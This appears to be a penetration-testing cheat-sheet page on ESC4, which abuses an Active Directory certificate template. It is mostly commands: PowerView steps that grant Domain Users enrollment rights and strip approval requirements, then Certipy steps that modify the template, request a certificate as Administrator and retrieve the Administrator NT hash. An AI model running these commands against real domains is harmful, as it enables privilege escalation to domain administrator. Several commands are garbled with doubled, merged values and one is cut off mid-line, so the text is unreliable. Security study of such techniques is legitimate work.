Skip to main content

ESC4

You can create misconfigurations even in templates that are not initially vulnerable. For example, enabling the mspki-certificate-name-flag for a template allowing domain authentication could result in a situation similar to ESC1. This might allow less privileged users to define a fake Subject Alternative Name and authenticate as another user.

Windows

Import-Module PowerView

PS /home/bobbuilder> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS /home/bobbuilder> Import-Module .\PowerView.ps1

Add Certificate-Enrollment rights (to the Domain Users group)

PS /home/bobbuilder> Add-DomainObjectAcl -TargetIdentity Template4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=lab,DC=local" -Verbose

Disabling Manager Approval Requirement

To disable the manager approval requirement, use the following PowerShell commands:

PS /home/bobbuilder> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity Template4 -Set @{'mspki-enrollment-flag'=9} -Verbose

Disabling Authorized Signature Requirement

To disable the authorized signature requirement, set mspki-ra-signature attribute to 0:

PS /home/bobbuilder> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab

Linux

Attacking ESC4 vulnerable template

bobbuilder$bob$ certipy template -u 'user1@local.lab'user1@minions.com' -p 'password1' -template Template4 -save-olold -dc-ip 10.10.10.10<ip>

ESC4 Template after modification

bobbuilder$bob$ certipy find -u 'user1@local.lab'user1@minions.com' -p 'password1' -vulnerable -stdout -dc-ip 10.10.10.10<ip>

Abusing the modified template

bobbuilder$bob$ certipy req -u 'user1@local.lab'user1@minions.com' -p 'password1' -ca lab-LAB-DC-CA -template Template4 -upn Administrator

Retrieve Administrator NT Hash

bobbuilder$bob$ certipy auth -pfx administrator.pfx -usernameu Administrator -domain local.labminions.com

Restore template configuration

bobbuilder$bob$ certipy template -u 'user1@local.lab'user1@minions.com' -p 'password1' -template Template4 -configuration Template4.json
  1. Create template
bobbuilder$bob$ certipy template -u "user1@local.lab"'user1@minions.com' -p "password1"'password1' -template SSLTemplate4 -save-old -dc-ip 10.10.10.10<ip>
  1. Restore
bobbuilder$bob$ certipy template -u "user1@local.lab"'user1@minions.com' -p "password1"'password1' -template SSLTemplate4 -configuration SSL.Template4.json -dc-ip 10.10.10.10<ip>